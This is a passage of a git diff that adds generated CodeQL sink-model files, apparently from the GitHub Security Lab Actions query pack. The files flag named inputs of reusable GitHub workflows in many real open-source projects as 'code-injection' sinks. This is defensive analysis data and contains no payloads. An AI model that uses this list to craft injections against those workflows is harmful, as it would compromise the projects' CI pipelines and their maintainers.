of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 00000000000..1478244cc9c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 00000000000..8bb0915294c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 00000000000..cba6c4fbe5a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 00000000000..448d48f661d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 00000000000..50eb3b1af36 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 00000000000..780fa92d20c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 00000000000..275d46772a2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 00000000000..271c80c575e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 00000000000..0f4ad0a7ca7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 00000000000..c38ae925860 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 00000000000..fd4697ac1c4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 00000000000..90c4c20b585 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 00000000000..51d99171a54 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 00000000000..8e74c9b811d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 00000000000..cd7de6d5786 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 00000000000..ecea4012c75 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 00000000000..f8ee5402a92 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 00000000000..aa76014db32 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 00000000000..e52ce3c8318 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 00000000000..31f24a27268 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 00000000000..4ace66c79c3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 00000000000..44518d6a348 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 00000000000..c0edbfae484 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 00000000000..a28ffce30f7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 00000000000..afe2daa172e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 00000000000..a07044c0ccc --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 00000000000..250307e3acd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 00000000000..e968f209706 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml new file mode 100644 index 00000000000..438f637a9a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml new file mode 100644 index 00000000000..7e7b82b25f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml new file mode 100644 index 00000000000..e3c3b19e441 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml new file mode 100644 index 00000000000..704adb3f121 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml new file mode 100644 index 00000000000..5300a7d145e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml new file mode 100644 index 00000000000..f82254bd22b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml new file mode 100644 index 00000000000..80a26a9e65f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml new file mode 100644 index 00000000000..eb5e7835565 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml new file mode 100644 index 00000000000..cd2629f49bc 
--- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml new file mode 100644 index 00000000000..77ad5d6a6d3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml new file mode 100644 index 00000000000..a881a1a5fd3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml new file mode 100644 index 00000000000..693d3abc03e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml new file mode 100644 index 00000000000..119cbe465e6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml new file mode 100644 index 00000000000..2d35b933923 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml 
